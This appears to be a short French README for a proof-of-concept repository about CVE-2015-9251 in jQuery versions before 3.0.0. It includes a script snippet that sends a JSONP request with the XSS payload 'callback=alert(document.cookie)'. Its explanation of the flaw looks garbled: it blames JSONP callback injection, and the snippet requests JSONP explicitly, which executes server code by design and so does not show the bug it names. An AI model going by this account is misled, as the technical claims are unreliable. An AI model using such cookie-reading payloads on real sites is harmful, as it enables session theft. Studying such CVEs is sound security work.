
PoC pour CVE-2015-9251 jQuery inférieur à 3.0.0.
PoC pour CVE-2015-9251 jQuery inférieur à 3.0.0.
Ce dépôt contient une Preuve de concept (PoC) pour la vulnérabilité CVE-2015-9251 dans la bibliothèque jQuery. La vulnérabilité permet une attaque de Cross-Site Scripting (XSS) via des appels JSONP sans assainissement, car jQuery permet l'injection de code dans le paramètre callback dans les versions antérieures à la 3.0.0.
CVE-2015-9251 affecte les versions de jQuery antérieures à la 3.0.0. La vulnérabilité est exploitée en manipulant le paramètre callback dans une requête JSONP, ce qui peut permettre l'exécution de code JavaScript arbitraire dans le navigateur de la victime. Cela peut entraîner l'exposition de données sensibles, comme les cookies de session.
Pour exécuter le PoC, suivez ces étapes :
<script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
<script>
// Función que simula una solicitud a un servidor vulnerable
$.ajax({
url: "https://example.com/api?callback=alert(document.cookie)",
dataType: "jsonp", // JSONP permite la ejecución de código en JSONP callbacks
success: function(response) {
console.log(response);
}
});
</script>